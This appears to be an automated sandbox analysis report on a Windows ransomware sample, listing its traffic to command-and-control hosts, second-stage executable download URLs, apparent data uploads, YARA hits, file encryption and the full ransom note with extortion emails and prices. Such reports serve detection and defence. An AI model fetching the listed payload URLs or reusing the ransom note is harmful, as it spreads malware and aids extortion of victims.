00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 
00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 172.67.139.220 172.67.139.220
Source: Joe Sandbox View IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View IP Address: 186.13.17.220 186.13.17.220
Source: Joe Sandbox View ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View ASN Name: TechtelLMDSComunicacionesInteractivasSAAR TechtelLMDSComunicacionesInteractivasSAAR
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGIIDHJEBGIDHJJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 5909Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: R5391762lf.exe, 00000007.00000003.1484423673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: global traffic DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic DNS traffic detected: DNS query: cajgtus.com
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGIIDHJEBGIDHJJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: R5391762lf.exe, 00000007.00000003.2068237141.000000000312E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101155549.000000000312E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe.K5.(
Source: R5391762lf.exe, 00000007.00000003.2068237141.000000000312E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101155549.000000000312E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe0K
Source: R5391762lf.exe, 00000007.00000003.1489131073.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: R5391762lf.exe, 00000007.00000003.1484310948.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: R5391762lf.exe, 00000007.00000003.1484368248.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: R5391762lf.exe, 00000007.00000003.1484423673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: R5391762lf.exe, 00000002.00000003.1391033574.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.000000000069C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: R5391762lf.exe, 00000002.00000003.1391033574.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.000000000069C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/eQ
Source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: R5391762lf.exe, 00000002.00000002.1397540119.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonn
Source: R5391762lf.exe, 00000007.00000003.1490848962.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://assets.activity.windows.com
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: R5391762lf.exe, 00000007.00000003.1491084288.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/generate_204
Source: R5391762lf.exe, 00000007.00000003.1491084288.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/react-native-community/react-native-netinfo
Source: R5391762lf.exe, 00000007.00000003.1488893485.00000000097E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 2_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Source: C:\_README.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0863PsawqSdoc0QOgEjKBd9id4JIag7gcdKbtNSaUgho6ODH4e
Source: Yara match File source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File moved: C:\Users\user\Desktop\IPKGELNTQY.docx
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File deleted: C:\Users\user\Desktop\IPKGELNTQY.docx
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File moved: C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.pdf
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File deleted: C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.pdf
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File moved: C:\Users\user\Desktop\GRXZDKKVDB.mp3
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d898effa-5251-49be-909e-6a34c1643269}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\appsglobals.txt -> decrypter\dvddecrypter.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\renderdoc\qrenderdoc.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\microsoft system center 2012 r2\service manager\microsoft.enterprisemanagement.servicemanager.ui.console.exe12438microsoft.appv.603b45325cf2a147a217bc0826e85cce12439{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\pro evolution soccer 2018\pes2018.exe12439c:\ignition\ignitioncasino.exe12440{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\splashdata\splashid safe\splashid safe.exe12440{6d809377-6af0-444b-8957-a3773f02200e}\native instruments\komplete kontrol\komplete kontrol.exe1244025342asdf3333.stoppuhrtimer_1xbryz0n7krfa!app12441{6d809377-6af0-444b-8957-a3773f02200e}\owasp\zed attack proxy\zap.exe12441{6d809377-6af0-444b-8957-a3773f02200e}\dell\toad for oracle 2015 r2 suite\toad for oracle 12.8\toad.exe12441{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mysql\mysql workbench 6.0 ce\mysqlworkbench.exe12441212377tik.7tik-tiktokforwindows_da70t93mgq52j!app12442{7c Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fa4f3cd-f899-4abc-9ee3-31954eeeae00}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File dropped: C:\Users\jones\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.9972815415
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{09d41dfb-343c-4c64-80de-0d8ebc18a6b9}\Apps.ft entropy: 7.99606416018
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{407fe2cc-e6ee-4027-aa00-b9fdf3f5b8e5}\0.0.filtertrie.intermediate.txt entropy: 7.99501322308
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{407fe2cc-e6ee-4027-aa00-b9fdf3f5b8e5}\Apps.ft entropy: 7.99630082306
